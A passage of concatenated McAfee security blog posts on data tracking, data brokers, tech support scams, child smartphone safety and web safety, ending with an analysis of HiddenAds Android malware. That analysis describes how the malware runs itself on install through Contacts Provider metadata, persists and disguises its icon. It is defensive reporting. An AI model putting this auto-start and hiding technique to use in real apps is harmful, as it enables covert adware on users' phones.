  • Attitudinal data. Companies measure brand and customer experiences using data on consumer satisfaction, product desirability, and purchase decisions. Marketing agencies use this data for direct consumer research and creative analysis.  

For someone unfamiliar with privacy issues, it is important to understand the extent of big tech’s tracking and data collection. Once these companies collect data, all this information can be supplied to third-party businesses or used to improve user experience.  

The problem with this is that big tech has blurred the line between collecting customer data and violating user privacy in some cases. While tracking what content you interact with can be justified under the garb of personalizing the content you see, big tech platforms have been known to go too far. Prominent social networks like Facebook and LinkedIn have faced past legal trouble for accessing personal user data like private messages and saved photos. 

How do companies use the information you provide

The information you provide helps build an accurate character profile and turns it into knowledge that gives actionable insights to businesses. Private data usage can be classified into three cases: selling it to data brokers, using it to improve marketing, or enhancing customer experience.  

To sell your info to data brokers

Along with big data, another industry has seen rapid growth: data brokers. Data brokers buy, analyze, and package your data. Companies that collect large amounts of data on their users stand to profit from this service. Selling data to brokers is an important revenue stream for big tech companies 

Advertisers and businesses benefit from increased information on their consumers, creating a high demand for your information. The problem here is that companies like Facebook and Alphabet (Google’s parent company) have been known to mine massive amounts of user data for the sake of their advertisers.  

To personalize marketing efforts

Marketing can be highly personalized thanks to the availability of large amounts of consumer data. Tracking your response to marketing campaigns can help businesses alter or improve certain aspects of their campaign to drive better results.  

The problem is that most AI-based algorithms are incapable of assessing when they should stop collecting or using your information. After a point, users run the risk of being constantly subjected to intrusive ads and other unconsented marketing campaigns that pop up frequently.  

To cater to the customer experience

Analyzing consumer behavior through reviews, feedback, and recommendations can help improve customer experience. Businesses have access to various facets of data that can be analyzed to show them how to meet consumer demands. This could help improve any part of a consumer’s interaction with the company, from designing special offers and discounts to improving customer relationships.  

For most social media platforms, the goal is to curate a personalized feed that appeals to the users and allows them to spend more time on the app. When left unmonitored, the powerful algorithms behind these social media platforms can repeatedly subject you to the same kind of content from different creators.  

Which companies track the most information?

Here are the big tech companies that collect and mine the most user data 

  • Google. Google is the most avid big tech data miner currently on the internet because the search engine deals almost exclusively with user data. Google tracks and analyzes everything from your Gmail and calling history (for VoLTE calls) to your Chrome browsing preferences through third-party cookies 
  • Facebook. Meta’s Facebook collects phone numbers, personal messages, public comments, and metadata from all of your photos and videos. Facebook primarily uses this data to fuel its demographic-based targeted ad mechanisms.  
  • Amazon. Amazon has recently admitted to storing many user data points, including phone numbers, credit card information, usernames, passwords, and even Social Security numbers. Amazon also stores information about your search terms and previously bought products.  
  • Twitter. Platforms like Twitter employ a “family of apps” technique to gather sensitive user data. While these platforms openly collect and mine user data themselves, they also collect information from app networks (like Twitter’s MoPub or Google’s AdMob) that include several other third-party apps. These apps choose to partner with tech giants for better profits.  
  • Apple. While much better than its competitors, Apple still mines a considerable amount of user data. While Apple’s systems allow users to control their privacy settings, Apple gives all of its users’ information to Apple’s iOS-based advertisement channels. The iPhone App Store is another place where user data is exclusively used to create customized user experiences. 
  • Microsoft. Microsoft primarily collects device-related data like system configurations, system capabilities, IP addresses, and port numbers. It also harvests your regular search and query data to customize your search options and make for a better user experience.  

Discover how McAfee can help protect your identity online 

Users need a comprehensive data privacy solution to tackle the rampant, large-scale data mining carried out by big tech platforms. While targeted advertisements and easily found items are beneficial, many of these companies collect and mine user data through several channels simultaneously, exploiting them in many different ways.  

It’s important to make sure your personal information is protected. Protection solutions like McAfee’s Personal Data Cleanup feature can help. With this feature, our teams scour the web for traces of your personal information and assist in getting it removed to enhance your online privacy.  

McAfee’s Total Protection provides antivirus software for all of your digital devices and a secure VPN connection to avoid exposure to malicious third parties while browsing the internet. Our identity monitoring and personal data removal solutions further remove gaps in your devices’ security systems.  

With our airtight data protection and custom guidance (complete with a protection score for each platform and tips to keep you safer), you can be sure that your internet identity is protected.  

The post What Personal Data Do Companies Track? appeared first on McAfee Blog.

]]>
Technical Support Scams – What to look out for https://www.mcafee.com/blogs/other-blogs/mcafee-labs/technical-support-scams-what-to-look-out-for/ Tue, 02 Aug 2022 23:22:17 +0000 https://www.mcafee.com/blogs/?p=157000

Authored by Oliver Devane Technical Support Scams have been targeting computer users for many years. Their goal is to make...

The post Technical Support Scams – What to look out for appeared first on McAfee Blog.

]]>

Authored by Oliver Devane

Technical Support Scams have been targeting computer users for many years. Their goal is to make victims believe they have issues needing to be fixed, and then charge exorbitant fees, which unfortunately some victims pay. This blog post covers a number of example actions, that scammers will go through when they are performing their scams. Our goal is to educate consumers on the signs to look out for, and what to do if they believe they are being scammed.

Advertising – The Lure

For a tech support scammer to reach their victims, they need to first find them (or be found by them). One technique we see includes scammers creating Twitter or other social media accounts that post messages claiming to be from the official technical support site. For example, a Twitter account will post a tweet with the hashtags #McAfee and #McAfeeLogin to drive traffic to the tweet and make victims believe the links are legitimate and safe to click.

Scammers behind tech support scams can create very convincing websites which mimic the official ones.

Some fraudulent websites use the McAfee logo or other company logos to try trick individuals. They often invite clicking on a ‘LOGIN’ or ‘ACTIVATE’ link with a similar color scheme to official sites to appear legitimate.

These sites may then ask the victim to enter their real username, password, and phone number. Upon entering these details, websites will usually show an error message to make the victim believe there is an issue with their account.

 

The error message will usually contain a link that upon clicking will load a chat box where the scammers will initiate a conversation with the victim. At this point, the scammers will have the phone number and email address associated with the victim. They will use this to contact them and make them believe they are an official technical support employee.

Gaining Access

The scammer’s next objective is often to gain access to the victim’s computer. They do this so that they can trick the victim into believing there is an issue with their computer and that they need their support services to fix it.

The scammers will do this by either asking the victim to enter a URL that will result in the download of a remote access tool or by providing them with a link in the chat window if they are still speaking to them on the fake support website.

A remote access tool will enable the scammer to take complete control of the victim’s machine. With this, they will be able to remove or install software, access personal data such as documents and cryptocurrency wallets as well as dump passwords from the web browsers so they can then access all the victim’s accounts.

It is vital to not provide remote access to your computer to unknown and unverified individuals, as there could be a big risk to your personal data. Some examples of remote access tools that have legitimate uses but are often used to perpetrate fraud are:

  • TeamViewer
  • LogMeIn
  • AnyDesk
  • Aweray (Awesun)

Activity once the connection is established

If the scammers are given access to the victim’s machine, they will often make use of the command filename cmd.exe to perform some visual activity on the computer screen which is done to attempt to trick the individual into believing that some malicious activity is occurring on their computer or network. Most people will be unaware of the filename cmd.exe and the actions being used,and thus will be none the wiser to the scammer’s actions.

Here are some examples we have seen scammers use:

Title

Changing the title of cmd.exe to ‘network scanner’ or ‘file scanner’ to make the victim believe they are running a security tool on their machine.

Directory enumeration

Scammers will make use of standard functions within the cmd.exe file, to make their victims believe they are performing lots of activity. One of these functions is ‘dir’ which will  display  all the files for a specific directory. For example, if you have a folder called ‘school work’ and have 2 word documents in there, a ‘dir’ query of that folder will appear like this:

What the scammers will do is make use of ‘dir’ and the title function to make you believe they are scanning your machine. Here is an example of running ‘dir’ on the all the files on a machine with the cmd.exe title set to ‘File Scanner’:

Tree

A similar function to ‘dir’ called ‘tree’ may also be used. The ‘tree’ function will display directory paths and will generate lots of events on the screen:

Tech Support Phone Number

Some scammers will also add their phone number to the taskbar of the victim’s machine. They do this by creating a new folder with the phone number as the name and adding it as a toolbar. This is shown in the image below

Software Installation

Scammers may install other software on the victim’s machine or make them believe that they have installed additional software which they will then be charged for.

For example, some scammers may add programs to the desktop of victims which have no purpose, but the scammers insist they are legitimate security tools such as firewalls or network scanners.

Some example filenames are:

  • Firewall security.exe
  • Network firewall.exe
  • Network security.exe
  • Email security.exe
  • Banking security.exe

Payment

The scammers will usually perform some activity on your machine before asking for payment. This is done to build confidence in their work and make you believe they have done some activity and therefore deserve some sort of payment. Do not be fooled by scammers who have not performed any useful activity.  As detailed in the previous sections, be careful not to fall victim to fake social media accounts or websites.

Signs to look out for

This section contains a few signs to look out for which may indicate that you are interacting with a scammer.

Rude/Short

Some scammers will become rude and very short with you if you start questioning what they are doing. They may say that you are not technical and do not understand what is occurring. This would not be the behavior of a legitimate technical support operative.

Leave the computer on

Scammers will encourage you to leave the machine and remote connection on even if you need to go out and leave it unattended. Do not under any circumstances do this as they would then be free to do any activity they wish on your machine and network.

Created files being detected

Some files added to your machine by the scammer may be detected by the AV security software. They may act like this is an error and the file is innocent. If you have initiated a remote connection and the controller creates a file on your machine which is detected by the security software, we recommend ceasing the interaction as detailed below.

What to do

The following steps should be performed if you believe you are being scammed as part of a tech support scam.

Disconnect the machine from the internet

If the machine is connected via a network cable, the easiest way is to unplug it. If the machine is connected via Wi-Fi, there may be a physical switch that can be used to disconnect it. If there is no physical switch, turn off Wi-Fi through the settings or the computer. It  can be powered down by pressing the power button.

Hang up

Hang up the phone (or end the chat) and do not answer any more calls from that number. The scammer will try to make you believe that the call is legitimate and ask you to reconnect the remote-control software.

Remove the remote-control software

If the scammer was controlling your machine, the remote-control software will need to be removed. If the computer was powered down, it can be powered back up, but if a popup is shown asking for permission to allow remote access, do not grant it.

The remote software can usually be removed by using the control panel and add/remove programs. To do this, press the Windows key and then perform a search for ‘remove’ and click on ‘Add or remove programs’.

Sort the programs by install date as shown below and then remove the remote software by clicking on the ‘Uninstall’ button.  Keep in mind that the software installed on your computer may appear by a different name, but if you look at what was installed on the same day as the scammer initiated the remote control session, you should be able to identify it.

Check the Antivirus Software for any exclusions

Some scammers may add exclusions for the files they create on your computer so that they are not detected by the security software. We recommend checking the exclusions and if any are present which were not added by yourself to remove them.

A guide for McAfee customers is available here

Update Antivirus Software and perform a full scan

After removing any software which was installed, we recommend updating your security software and performing a full scan. This will identify any malicious files created by the scammer such as password stealers and keyloggers.

Change passwords

After performing a full scan, we recommend changing all of your passwords as the scammer may have gathered your credentials while they had access to your computer. It is recommended to do this after performing a full scan as the scammers may have placed a password stealer on the computer and any new passwords you enter may also be stolen.

Conclusion

This blog post contains a number of examples that scammers may use to trick consumers into believing that they may have issues with their devices. If you are experiencing issues with your computer and want to speak to official McAfee support, please reach out via the official channel which is https://service.mcafee.com/.

The McAfee support pages can also be accessed directly via the McAfee Total Protection screen as shown below:

McAfee customers utilizing web protection (including McAfee Web Advisor) are protected from known malicious sites.

The post Technical Support Scams – What to look out for appeared first on McAfee Blog.

]]>
How Data Brokers Sell Your Identity https://www.mcafee.com/blogs/tips-tricks/how-data-brokers-sell-your-identity/ Tue, 02 Aug 2022 13:44:28 +0000 https://www.mcafee.com/blogs/?p=157147

Our personal and professional lives are becoming increasingly intertwined with the online world. Regular internet usage has made us all...

The post How Data Brokers Sell Your Identity appeared first on McAfee Blog.

]]>

Our personal and professional lives are becoming increasingly intertwined with the online world. Regular internet usage has made us all prone to cyber-security risks. You leave a digital footprint every time you use the internet, which is a trace of all your online activities.  

When you create new accounts or subscribe to different websites, you give them explicit (or implicit, through their family of apps or subsidiary websites) access to your personal and credit card information. In other cases, websites might track basic information without your knowledge, such as your location and search history. 

There is an industry of data brokers specifically dedicated to keeping track of user data, packaging it, and supplying it to tech companies who use it to run targeted ads and enhance on-platform user experience. Given the widespread use of the internet and exponential improvements in technology, data has become a valuable commodity — creating a need for the sale and purchase of user data.  

This article discusses how data brokers sell your personal information and how you can minimize risk. 

What are data brokers?

Data brokers are companies that aggregate user information from various sources on the internet. They collect, collate, package, and sometimes even analyze this data to create a holistic and coherent version of you online. This data is then supplied to tech companies to fuel their third-party advertising-centered business models.  

Companies interested in buying data include but are not limited to: 

 

  • Tech platforms 
  • Banks 
  • Insurance companies 
  • Political consultancies 
  • Marketing firms 
  • Retailers 
  • Crime-fighting bureaus 
  • Investigation bureaus 
  • Video streaming service providers 
  • Any other businesses involved in sales  

These companies and social media platforms use your data to better understand target demographics and the content with which they interact. While the practice isn’t unethical in and of itself (personalizing user experiences and creating more convenient UIs are usually cited as the primary reasons for it), it does make your data vulnerable to malicious attacks targeted toward big-tech servers. 

How do data brokers get your information?

Most of your online activities are related. Devices like your phone, laptop, tablets, and even fitness watches are linked to each other. Moreover, you might use one email ID for various accounts and subscriptions. This online interconnectedness makes it easier for data brokers to create a cohesive user profile.  

Mobile phone apps are the most common way for data brokerage firms to collect your data. You might have countless apps for various purposes, such as financial transactions, health and fitness, or social media 

A number of these apps usually fall under the umbrella of the same or subsidiary family of apps, all of which work toward collecting and supplying data to big tech platforms. Programs like Google’s AdSense make it easier for developers to monetize their apps in exchange for the user information they collect.  

Data brokers also collect data points like your home address, full name, Social Security number, phone number, and date of birth. They have automated scraping tools to quickly collect relevant information from public profiles.[Text Wrapping Break] 

Lastly, data brokers can gather data from other third parties that track your cookies or even place trackers or cookies on your browsers. Cookies are small data files that track your online activities when visiting different websites. They track your IP address and browsing history, which third parties can exploit. Cookies are also the reason you see personalized ads and products. 

How data brokers sell your identity 

Data brokers collate your private information into one package and sell it to “people search” websites like Spokeo or TruePeopleSearch. You or a tech business can use these websites to search for people and get extensive consumer data. People search sites also contain public records like voter registration information, marriage records, and birth certificates. This data is used for consumer research and large-scale data analysis.  

Next, marketing and sales firms are some of data brokers’ biggest clients. These companies purchase massive data sets from data brokers to research your data profile. They have advanced algorithms to segregate users into various consumer groups and target you specifically. Their predictive algorithms can suggest personalized ads and products to generate higher lead generation and conversation percentages for their clients.  

Are data brokers legal?

We tend to accept the terms and conditions that various apps ask us to accept without thinking twice or reading the fine print. You probably cannot proceed without letting the app track certain data or giving your personal information. To a certain extent, we trade some of our privacy for convenience. This becomes public information, and apps and data brokers collect, track, and use our data however they please while still complying with the law.  

There is no comprehensive privacy law in the U.S. on a federal level. This allows data brokers to collect personal information and condense it into marketing insights. While not all methods of gathering private data are legal, it is difficult to track the activities of data brokers online (especially on the dark web). As technology advances, there are also easier ways to harvest and exploit data.  

Vermont and California have already enacted laws to regulate the data brokerage industry. In 2018, Vermont passed the country’s first data broker legislation. This requires data brokers to register annually with the Secretary of State and provide information about their data collection activities, opt-out policies, purchaser credentialing practices, and data breaches 

California has passed similar laws to make data brokering a more transparent industry. For risk mitigation of data brokerage, the Federal Trade Commission (FTC) has published reports and provided recommendations to Congress to reduce the engagement of data broker firms. Giving individuals the right to opt-out of the sale of their personal data is a step toward a more rigorous law regarding data privacy 

Can you remove yourself from data broker websites?

Some data brokers let you remove your information from their websites. There are also extensive guides available online that list the method by which you can opt-out of some of the biggest data brokering firms. For example, a guide by Griffin Boyce, the systems administrator at Harvard University’s Berkman Klein Center for Internet and Society, provides detailed information on how to opt-out of a long list of data broker companies. 

Acxiom, LLC is one of the largest data brokering firms and has collected data for approximately 68% of people who have an online presence. You can opt-out of their data collection either through their website or by calling them directly. 

Epsilon Data Management is another big player in the data broker industry that operates as a marketing service and marketing analytics company. You can opt-out of their website through various methods such as by email, phone, and mail. Credit rating agencies like Experian and Equifax are also notorious for collecting your data. Similarly, you can opt-out through their websites or by calling them. 

Keep your personal information secure online with McAfee Total Protection

McAfee is a pioneer in providing online and offline data protection to its customers. We offer numerous cybersecurity services for keeping your information private and secure.  

With regard to data brokers, we enable users to do a personal data clean-up. Cleaning up your personal data online may be a difficult task, as it requires you to reach out to multiple data brokers and opt out. Instead, sign up for McAfee’s Personal Data Cleanup feature to do a convenient and thorough personal data clean-up. We will search for traces of your personal data and assist in getting it removed.  

The post How Data Brokers Sell Your Identity appeared first on McAfee Blog.

]]>
Getting Your Kids Ready for School—And Their Smartphones Too https://www.mcafee.com/blogs/family-safety/getting-your-kids-ready-for-school-and-their-smartphones-too/ Tue, 02 Aug 2022 12:22:02 +0000 https://www.mcafee.com/blogs/?p=156374

If you’re the parent of a tween or teen, chances are they’re not the only ones going back to school....

The post Getting Your Kids Ready for School—And Their Smartphones Too appeared first on McAfee Blog.

]]>

If you’re the parent of a tween or teen, chances are they’re not the only ones going back to school. Their smartphones are going back too.

Our recent global research showed just how many tweens and teens use a smartphone. Plenty. Depending on the age band, that figure ranges anywhere from 76% to 93%, with some noteworthy variations between countries.

One of the top reasons parents give their child a phone is to stay in touch, so it likely follows that those phones will likely make their way into the classroom. Whether or not that’s the case for your child, back-to-school time is still a great time to help your child stay safer on their phone—and keep their phones safer too in the event of loss or theft.

Seven steps for keeping your child’s phone safer

Install protection on their phone

Comprehensive online protection software can protect your phone in the same way that it protects your laptops and computers. Unfortunately, while many people use it on their laptops and computers, far fewer people use it on their phones—only about 42% of tweens and teens worldwide use it on their smartphones according to our most recent research.

Installing it can protect their privacy, keep them safe from attacks on public Wi-Fi, and automatically block unsafe websites and links, just to name a few things it can do. You can find our smartphone apps in both Google Play and the Apple App Store.

Set their apps to automatically update

Updates do all kinds of great things for gaming, streaming, and chatting apps, such as adding more features and functionality over time. Updates do something else—they make those apps more secure. Hackers will hammer away at apps to find or create vulnerabilities, which can steal personal info or compromise the device itself. Updates will often include security improvements, in addition to performance improvements.

iPhones update apps automatically by default, yet you can learn how to turn them back on here if they’ve been set to manual updates. For Android phones, this article can help you set apps to auto-update if they aren’t set that way already.

Much the same goes for the operating system on smartphones too. Updates can bring more features and more security. iOS users can learn how to update their phones automatically in this article. Likewise, Android users can refer to this article about automatic updates for their phones.

Use a lock screen with a passcode, PIN, facial recognition, or pattern key

Another finding from our latest global research is just how few people use a lock screen on their phones. Only 56% of parents said that they protect their smartphone with a password or passcode, and only 42% said they do the same for their child’s smartphone—a further 14% drop between parents and kids.

The issue here is clear. If an unlocked phone gets lost or stolen, all the information on it is an open book to a potential hacker, scammer, or thief. Enabling a lock screen if you haven’t already. It’s a simple feature found in both iOS and Android devices.

Learn how to remotely lock or wipe a smartphone

Preventing the actual theft of your phone is important too, as some hacks happen simply because a phone falls into the wrong hands. This is a good case for password or PIN protecting your phone, as well as turning on device tracking so that you can locate your phone or even wipe it remotely if you need to. Apple provides iOS users with a step-by-step guide for remotely wiping devices, and Google offers up a guide for Android users as well.

Use a password manager

Strong, unique passwords offer another primary line of defense. Yet with all the accounts we have floating around, juggling dozens of strong and unique passwords can feel like a task—thus the temptation to use (and re-use) simpler passwords. Hackers love this because one password can be the key to several accounts. Instead, try a password manager that can create those passwords for you and safely store them as well. Comprehensive security software will include one, and McAfee also offers a free service with True Key.

Have your kids steer clear of third-party app stores

Google Play and Apple’s App Store have measures in place to review and vet apps to help ensure that they are safe and secure. Third-party sites may not have that process in place. In fact, some third-party sites may intentionally host malicious apps as part of a broader scam. Granted, cybercriminals have found ways to work around Google and Apple’s review process, yet the chances of downloading a safe app from them are far greater than anywhere else. Furthermore, both Google and Apple are quick to remove malicious apps once discovered, making their stores that much safer.

Teach your kids about the hazards of public Wi-Fi and how to use a VPN

One way that crooks can hack their way into your phone is via public Wi-Fi, such as at coffee shops, libraries, and other places on the go. These networks are public, meaning that your activities are exposed to others on the network—your banking, your password usage, all of it. One way to make a public network private is with a VPN, which can keep you and all you do protect from others on that Wi-Fi hotspot. Note that our VPN can turn on automatically for public Wi-Fi, protecting account credentials, search habits, and other activities online. ​

A quick word about desktops and laptops too

The same advice applies for these devices as well—strong online protection software, password management, VPN usage, and so on. What’s good for a smartphone is good for laptops and desktops too.

For laptops in particular, you can track these devices as well, just like a smartphone. The process differs from smartphones, yet it’s still quite straightforward. Windows and Mac users can enable the following settings—and you can click the links below for complete instructions from the source:

Putting these same protections in place on your laptops and desktops will help make your child, and your whole family, safer than before.

Note that on school-issued devices, your school district will likely have technology teams who manage them. As part of that, they typically have policies and restrictions in place to help keep them running safe and sound. If you have any questions about what kind of protections are in place on these school-issued devices, contact your school district.

Protecting your child

While we’ve largely focused on protecting the phone itself, there’s also the importance of protecting the person who’s using it. In this case, your child—what they see, do, and experience on the internet. Device security is only part of the equation there.

Parents of tweens and teens know the concerns that come along with smartphone usage, ranging anywhere from cyberbullying, too much screen time, and simply wanting to know what their child is up to on their phone.

As you can imagine, each of these topics deserves its own treatment. The “Family Safety” section of our blog offers parents and their kids alike plenty of resources, and the list below can get you started on a few of the most pressing issues:

Smartphone ownership—a device full of teaching moments

Without a doubt, while a child may get their first smartphone to “keep in touch,” that ownership blossoms into something far greater. And quite quickly. As they dive into the world of apps, social media, messaging, and gaming, take an interest, take it as an opportunity to spend time talking about their day and what it was like online.

By asking if they grabbed any cool pictures, what their favorite games are, and how their friends are when your child is texting them, questions like these can open a look into a world that would otherwise remain closed. This way, talking about the phone and what they’re doing on it becomes part of normal, everyday conversation. This can reap benefits down the road when your child encounters the inevitable bumps along the way, whether they’re dealing with a technical issue or something as difficult as cyberbullying or harassment. Talking about their life online on a regular basis may make them more apt to come forward when there’s a problem than they otherwise might.

In all, think of the smartphone as a fast pass into adulthood, thanks to how it puts the entirety of the internet right in your child’s hand. Protecting the device and the kid who’s using it will help ensure they get the absolute best out of all that potential.

The post Getting Your Kids Ready for School—And Their Smartphones Too appeared first on McAfee Blog.

]]>
Celebrate World Wide Web Day: The Evolution of Web Safety https://www.mcafee.com/blogs/internet-security/celebrate-world-wide-web-day-the-evolution-of-web-safety/ Mon, 01 Aug 2022 13:34:08 +0000 https://www.mcafee.com/blogs/?p=157114

The World Wide Web, invented in 1989 by Tim Berners-Lee, has undoubtedly made our lives more convenient in so many...

The post Celebrate World Wide Web Day: The Evolution of Web Safety appeared first on McAfee Blog.

]]>

The World Wide Web, invented in 1989 by Tim Berners-Lee, has undoubtedly made our lives more convenient in so many ways. 

For example, family road trips looked a lot different than they do today. Preteens were designated backseat navigators, with huge atlases spread across their laps, yelling “Turn left here! No wait, right!” Then, when you finally arrived at your destination, what was there to do? Time to poll the hotel concierge, gas station attendants, and grocery store clerks about the best places to visit and directions on how to get there. 

Now, your car and phone can speak to you in a calm voice, guide you where you need to go, and tell you what to do once you get there. Life changing! 

However, the Web also has made our lives more complicated in several ways. The number of cybercrimes — in variety and prevalence — seem to rise every day. Luckily, what has also become more sophisticated are our available tools to combat cybercriminals and protect our online information, privacy, and identity. 

Here’s a look back at the evolution of cyberthreats and cyber-protection to commemorate World Wide Web Day and share some tips on how to use the Web safely and with confidence. 

Then: Viruses and Malware 

In the early days of the Web, viruses and malware caused many a desktop computer to fall into disrepair. Though, whenever anyone caught a virus of the cyber variety, they were never too surprised. That was usually the cost of illegally downloading music or videos or clicking on pop-ups from sites that were notorious for spreading malicious software. 

Now: Phishing 

Fast forward to today and viruses and malware have been disguised by phishing, a tactic where malicious software is hidden within legitimate-looking electronic correspondences (email, text, or direct message). People are now wise to which sketchy websites to avoid, so, to spread their malicious software, cybercriminals use false authority and play on people’s emotions to get them to click on dangerous links and divulge valuable personal information. Phishing can result in huge financial losses. One study calculates that companies lose $15 million annually to phishing.1 Here are a few tips to avoid falling for a phishing attempt and keep your family’s personal information safe: 

  • Always hover your cursor over links before clicking. Before clicking on any link, make sure to check where it will direct you to. If the URL has typos or redirects to a completely new website you don’t recognize, do not click it and delete the message. 
  • Take your time. Lots of phishers rely on intense emotions to get people to act quickly without thinking about what’s being asked of them. If you receive a suspicious message urging you to act fast to avoid dire consequences, it’s best to step back and take a breath. For example, the IRS will never tell you to reply to an email in an hour or they’ll throw you in jail for tax evasion. Never reply to emails asking for your password, Social Security Number, banking details, etc. 
  • When in doubt, follow up with the official source. If you receive a suspicious email from your bank or an out-of-character direct message from a social media connection, do not reply to the message. Instead, call them, send them a separate email, or start a chat with customer service to clarify that they indeed sent that message and confirm what action, if any, is required. 
  • Invest in antivirus software. McAfee antivirus has been a go-to antivirus software provider for decades. Today, McAfee antivirus is a trusted protector of 600 million devices! It guards against viruses and malware, but also against more modern cyberthreats such as ransomware and phishing. 

Then: Desktop Security 

In the 1990s, portable phones weren’t in everyone’s pockets. And the cellphones that were available to the public at a reasonable price certainly didn’t connect to the Web. The average person was concerned primarily with their desktop security. As long as users steered clear of malicious software, subscribed to an antivirus, and didn’t leave their password on a sticky note on their desk, they were likely to remain in the clear.   

Now: Mobile and Desktop Security 

Today, homes have multiple connected devices, all of which require that people protect them with great cyber-habits, passwords, and technology. Even your smart home assistants are vulnerable to cyberthreats. Don’t worry though, there are plenty of easy things you can do every day to keep your family’s information and devices safe. 

Starting with passwords: The best passwords and passphrases are the ones you don’t have to remember. Apple is actually trying to eliminate the need for typing in passwords, instead relying on biometric security measures, such as face facial recognition and fingerprint scanning.2 If your device doesn’t have these scanning capabilities, a password manager is an excellent way to safeguard your passwords to all your accounts. McAfee True Key guards your passwords with one of the strongest encryption algorithms available. On top of that, multi-factor authentication is another layer of security that stops thieves from stealing your passwords and trading them on the dark Web. With a password manager, you’ll never have to write down, reuse, or worry about forgetting your password and username combinations. 

Next, a VPN for your mobile devices and desktop is another great shield against cybercriminals. A virtual private network hides your location data and makes it extremely difficult for public wi-fi eavesdroppers to track your movements on the Web. It’s a great practice to never connect any device to a public wi-fi connection without a VPN, especially if you’re online shopping, handling sensitive information, or banking online. 

Finally, another key tool in ensuring your mobile and desktop security is knowing where you stand: How protected are you? What are some habits you should improve? How can you constantly monitor your safety and be in the know when your status changes? The answer: McAfee Protection Score. This unique service scans your wi-fi connection, the dark Web, and data breach records for threats to your personally identifiable information (PII) and connected device. Then, the software recommends ways to improve your security, in turn boosting your score. It’s a quick and visual way to evaluate your habits and make sure you’re doing everything you can to protect your connected family. 

Then: Dumpster Diving Identity Theft 

In the infancy of the World Wide Web, identity theft via the internet wasn’t really a thing. Mostly, identities and PII were stolen through discarded mail, overheard conversations, or stealing someone’s physical wallet.  

Now: Cyber Identity Theft 

Identity theft is a major concern. Cybercriminals are becoming smarter and more determined to release PII on the dark Web for profit. Phishing, social media snooping, data breaches, and hacking are common modern ways criminals steal valuable personal information, in addition to low-tech dumpster diving and wallet theft. With your full name, birthdate, and Social Security Number, criminals can cause severe damage to your credit that could take years and a large investment to repair. 

Some tips to avoid being a victim of identity theft is to improve your phishing detection skills, avoid oversharing on social media, delete old accounts you don’t use anymore and know how to identify the signs of identity theft. An identity monitoring service, like McAfee Advanced Protection, is your all-in-one privacy and identity protection service for your digital life. It covers you for $1 million in identity theft coverage and restoration. Plus, the service includes all the important tools outlined above: antivirus, VPN, password manager, and Protection Score. 

This World Wide Web Day, Celebrate Your Web Confidence 

The Web, not to be confused with the internet, is the collection of pages that one can access using the internet. You likely use it every day, thus it’s key to navigate it safely and with confidence. The Web has come a long way, and in a decade, it’s likely to look completely different than it does right now. The key is to be adaptable and careful and have the right tools to help you fill in the gaps.  

1Ponemon Institute, “The 2021 Cost of Phishing Study 

2CNET, “Apple Is Trying to Kill Passwords With Passkeys Using Touch ID and Face ID 

The post Celebrate World Wide Web Day: The Evolution of Web Safety appeared first on McAfee Blog.

]]>
New HiddenAds malware affects 1M+ users and hides on the Google Play Store https://www.mcafee.com/blogs/other-blogs/mcafee-labs/new-hiddenads-malware-that-runs-automatically-and-hides-on-google-play-1m-users-affected/ Fri, 29 Jul 2022 03:32:01 +0000 https://www.mcafee.com/blogs/?p=156418

Authored by Dexter Shin McAfee’s Mobile Research Team has identified new malware on the Google Play Store. Most of them...

The post New HiddenAds malware affects 1M+ users and hides on the Google Play Store appeared first on McAfee Blog.

]]>

Authored by Dexter Shin

McAfee’s Mobile Research Team has identified new malware on the Google Play Store. Most of them are disguising themselves as cleaner apps that delete junk files or help optimize their batteries for device management. However, this malware hides and continuously show advertisements to victims. In addition, they run malicious services automatically upon installation without executing the app.

HiddenAds functions and promotion

They exist on Google Play even though they have malicious activities, so the victim can search for the following apps to optimize their device.

Figure 1. Malware on Google Play
Figure 1. Malware on Google Play

Users may generally think installing the app without executing it is safe. But you may have to change your mind because of this malware. When you install this malware on your device, it is executed without interaction and executes a malicious service.

In addition, they try to hide themselves to prevent users from noticing and deleting apps. Change their icon to a Google Play icon that users are familiar with and change its name to ‘Google Play’ or ‘Setting.’

Figure 2. Hide itself by changing icons and names
Figure 2. The Malware hides itself by changing icons and names

Automatically executed services constantly display advertisements to victims in a variety of ways.

Figure 3. A sudden display of advertisements
Figure 3. A sudden display of advertisements

These services also induce users to run an app when they install, uninstall, or update apps on their devices.

Figure 4. A button to induce users to run app

Figure 4. A button to induce users to run app
Figure 4. A button to induce users to run app

To promote these apps to new users, the malware authors created advertising pages on Facebook. Because it is the link to Google Play distributed through legitimate social media, users will download it without a doubt.

Figure 5. Advertising pages on Facebook

Figure 5. Advertising pages on Facebook
Figure 5. Advertising pages on Facebook

How it works

This malware uses the Contact Provider. The Contact Provider is the source of data you see in the device’s contacts application, and you can also access its data in your own application and transfer data between the device and online services. For this, Google provides ContactsContract class. ContactsContract is the contract between the Contacts Provider and applications. In ContactsContract, there is a class called Directory. A Directory represents a contacts corpus and is implemented as a Content Provider with its unique authority. So, developers can use it if they want to implement a custom directory. The Contact Provider can recognize that the app is using a custom directory by checking special metadata in the manifest file.

Figure 6. Content providers declared with special metadata in manifest
Figure 6. Content providers declared with special metadata in manifest

The important thing is the Contact Provider automatically interrogates newly installed or replaced packages. Thus, installing a package containing special metadata will always call the Contact Provider automatically.

The first activity defined in the application tag in the manifest file is executed as soon as you install it just by declaring the metadata. The first activity of this malware will create a permanent malicious service for displaying advertisements.

Figure 7. Create a malicious service for displaying ads
Figure 7. Create a malicious service for displaying ads

In addition, the service process will generate immediately even if it is forced to kill.

Figure 8. Malicious service process that continues to generate
Figure 8. Malicious service process that continues to generate

Next, they change their icons and names using the <activity-alias> tag to hide.

Figure 9. Using <activity-alias> tags to change app icons and names
Figure 9. Using tags to change app icons and names

Users infected worldwide

It is confirmed that users have already installed these apps from 100K to 1M+. Considering that the malware works when it is installed, the installed number is reflected as the victim’s number. According to McAfee telemetry data, this malware and its variants affect a wide range of countries, including South Korea, Japan, and Brazil:

Figure 10. Top affected countries include South Korea, Japan, and Brazil
Figure 10. Top affected countries include South Korea, Japan, and Brazil

Conclusion

This malware is auto-starting malware, so as soon as the users download it from Google Play, they are infected immediately. And it is still constantly developing variants that are published by different developer accounts. Therefore, it is not easy for users to notice this type of malware.

We already disclosed this threat to Google and all reported applications were removed from the Play Store. Also, McAfee Mobile Security detects this threat as Android/HiddenAds and protects you from this type of malware. For more information about McAfee Mobile Security, visit https://www.mcafeemobilesecurity.com

Indicators of Compromise

Applications:

App Name Package Name Downloads
Junk Cleaner cn.junk.clean.plp 1M+
EasyCleaner com.easy.clean.ipz 100K+
Power Doctor com.power.doctor.mnb 500K+
